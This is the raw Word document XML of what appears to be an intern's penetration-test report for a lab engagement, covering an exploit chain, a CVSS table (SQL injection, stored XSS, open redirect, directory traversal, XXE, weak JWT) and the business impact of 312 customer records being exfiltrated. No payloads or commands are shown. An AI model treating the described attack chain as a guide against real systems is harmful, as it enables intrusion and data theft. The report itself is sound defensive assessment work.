      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">05-exfil-sample.csv</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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The recovered export preserves the structure of the compromised dataset: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 w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Customer ID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8"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Full Name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8"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Email Address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8"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Number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8"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Balance (NGN)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beforeAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Last Login Timestamp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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The evidence notes that 312 customer records matched the recovered export.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32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hands the next hop: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mission complete–the attacker has successfully removed sensitive customer information from the environment</w:t>
      </w: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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS Table</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:lock w:val="contentLocked"/>
        <w:id w:val="1698603123"/>
        <w:tag w:val="goog_rdk_0"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="Table1"/>
            <w:tblW w:w="1068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560"/>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="2490"/>
            <w:tblGridChange w:id="0">
              <w:tblGrid>
                <w:gridCol w:w="1950"/>
                <w:gridCol w:w="1560"/>
                <w:gridCol w:w="1560"/>
                <w:gridCol w:w="1560"/>
                <w:gridCol w:w="156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OWASP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 3.1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Base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Chained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Quantified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SQL Injection Authentication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A03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CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L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9.8 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Enables full administrator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Stored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A03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CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N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8.8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Session theft of administrators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Open Redirect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A01 Broken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CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N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6.1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Credential phishing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Directory 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A01 Broken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CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N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7.5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Sensitive file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XXE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A05 Security Misconfiguration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CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N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8.6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Server-side file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Weak JWT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A07 Identification &amp; Authentication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CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N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9.1 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Authentication compromise</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
        </w:tbl>
      </w:sdtContent>
    </w:sd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sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Business Impact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The exfiltrated data set has been found to consist of 312 records of customers containing personally identifiable information (name, email), partial account numbers and Nigerian Naira account balances, and login time stamps. While the supplied CSV contains dummy data the text stated that the CSV reflects the structure of the data found and we assumed all 312 accounts represented live customers. Personal data (full name and email) combined with partial financial details provides a risk of identity theft, spearphishing, and account take over for identified customers. As the compromise occurred just over six weeks prior to the planned launching of BoltCash, the incident would be considered highly damaging from a compliance, operational and reputational standpoint, during the company’s most vulnerable and important business development phase. We cannot determine a precise financial loss, however exposure of 312 customer’s financial data records would necessarily result in costs for customer notifications, account resets, incident response, Forensic investigation and regulatory notification in addition to any fraud perpetrated against the customer base.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId7" w:type="first"/>
      <w:footerReference r:id="rId8"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Style w:val="Title"/>
      <w:rPr>
        <w:color w:val="000000"/>
        <w:sz w:val="50"/>
        <w:szCs w:val="50"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.a0fne77sil57" w:id="0"/>
    <w:bookmarkEnd w:id="0"/>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
        <w:sz w:val="50"/>
        <w:szCs w:val="50"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">D2 - Exploit Chain + CVSS and Business Impact</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
    <w:pPr>
      <w:pStyle w:val="Subtitle"/>
      <w:jc w:val="left"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.usq0btxqxzyj" w:id="1"/>
    <w:bookmarkEnd w:id="1"/>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Author: SpicyMeatball41</w:t>
      <w:br w:type="textWrapping"/>
      <w:t xml:space="preserve">Intern ID: UBI-2026-0257</w:t>
      <w:tab/>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
    <w:pPr>
      <w:pStyle w:val="Subtitle"/>
      <w:jc w:val="left"/>
      <w:rPr/>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.bad3k6vqmx3" w:id="2"/>
    <w:bookmarkEnd w:id="2"/>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Engagement: Sankofa Digital</w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">Date: 18-06-2026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1e40af"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="80" w:before="160" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="1e40af"/>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f172a"/>
      <w:sz w:val="23"/>
      <w:szCs w:val="23"/>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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="1e40af"/>
      <w:sz w:val="46"/>
      <w:szCs w:val="46"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="1e40af"/>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sfxFNZ+2D+iC900uqCO1LU1HA==">CgMxLjAaHgoBMBIZChcICVITChF0YWJsZS5hY2g5aHdlNmF3bzIOaC5hMGZuZTc3c2lsNTcyDmgudXNxMGJ0eHF4enlqMg1oLmJhZDNrNnZxbXgzOAByITFLYjJVOGRFd2Rfczk0NGU3UHJEWmpEem5kQVRzYldvbA==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